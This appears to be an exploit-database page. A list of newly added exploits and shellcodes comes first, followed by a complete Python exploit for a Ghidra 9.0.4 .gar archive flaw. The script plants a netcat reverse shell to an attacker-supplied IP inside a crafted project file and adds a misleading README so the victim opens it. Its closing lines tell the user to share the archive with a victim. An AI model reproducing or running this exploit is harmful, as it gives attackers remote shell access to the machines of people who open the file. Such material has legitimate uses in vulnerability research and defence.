
17 changes to exploits/shellcodes VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow Linux - Use-After-Free Reads in show_numa_stats() WebKit - UXSS via XSLT and Nested Document Replacements Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit) ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit) Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit) BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting Cisco Adaptive Security Appliance - Path Traversal (Metasploit) UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion osTicket 1.12 - Persistent Cross-Site Scripting via File Upload osTicket 1.12 - Formula Injection osTicket 1.12 - Persistent Cross-Site Scripting Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
60 lines
No EOL
2.5 KiB
Python
Executable file
60 lines
No EOL
2.5 KiB
Python
Executable file
import os
|
|
import inspect
|
|
import argparse
|
|
import shutil
|
|
from shutil import copyfile
|
|
|
|
print("")
|
|
print("")
|
|
print("################################################")
|
|
print("")
|
|
print("------------------CVE-2019-13623----------------")
|
|
print("")
|
|
print("################################################")
|
|
print("")
|
|
print("-----------------Ghidra-Exploit-----------------")
|
|
print("--Tested version: Ghidra Linux version <= 9.0.4-")
|
|
print("------------------------------------------------")
|
|
print("")
|
|
print("################################################")
|
|
print("")
|
|
print("----------Exploit by: Etienne Lacoche-----------")
|
|
print("---------Contact Twitter: @electr0sm0g----------")
|
|
print("")
|
|
print("------------------Discovered by:----------------")
|
|
print("---------https://blog.fxiao.me/ghidra/----------")
|
|
print("")
|
|
print("--------Exploit tested on Ubuntu 18.04----------")
|
|
print("-----------------Dependency: zip----------------")
|
|
print("")
|
|
print("################################################")
|
|
print("")
|
|
print("")
|
|
|
|
parser = argparse.ArgumentParser()
|
|
parser.add_argument("file", help="Path to input export .gar file",default=1)
|
|
parser.add_argument("ip", help="Ip to nc listener",default=1)
|
|
parser.add_argument("port", help="Port to nc listener",default=1)
|
|
|
|
args = parser.parse_args()
|
|
|
|
if args.ip and args.port and args.file:
|
|
|
|
rootDirURL=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
|
|
path = "../Ghidra/Features/Decompiler/os/linux64/decompile"
|
|
os.system("mkdir -p ../Ghidra/Features/Decompiler/os/linux64/")
|
|
os.system("echo 'rm -f x; mknod x p && nc "+args.ip+" "+args.port+" 0<x | /bin/bash 1>x' > decompile")
|
|
os.system("chmod +x decompile")
|
|
copyfile("decompile",path)
|
|
copyfile(args.file,rootDirURL+"/"+"project.gar")
|
|
os.system("zip -q project.gar ../Ghidra/Features/Decompiler/os/linux64/decompile")
|
|
os.system("echo 'To fully export this archive, place project.gar to GHIDRA_INSTALL_DIR root path and open it with Restore Project at Ghidra.' > README_BEFORE_OPEN_GAR_FILE")
|
|
os.system("zip -q project.zip README_BEFORE_OPEN_GAR_FILE")
|
|
os.system("zip -q project.zip project.gar")
|
|
os.system("rm decompile README_BEFORE_OPEN_GAR_FILE")
|
|
os.system("rm project.gar")
|
|
print("You can now share project.zip and start your local netcat listener.")
|
|
print("")
|
|
print("Project.gar must be placed and opened by victim at GHIDRA_INSTALL_DIR")
|
|
print("root path for payload execution.")
|
|
print("") |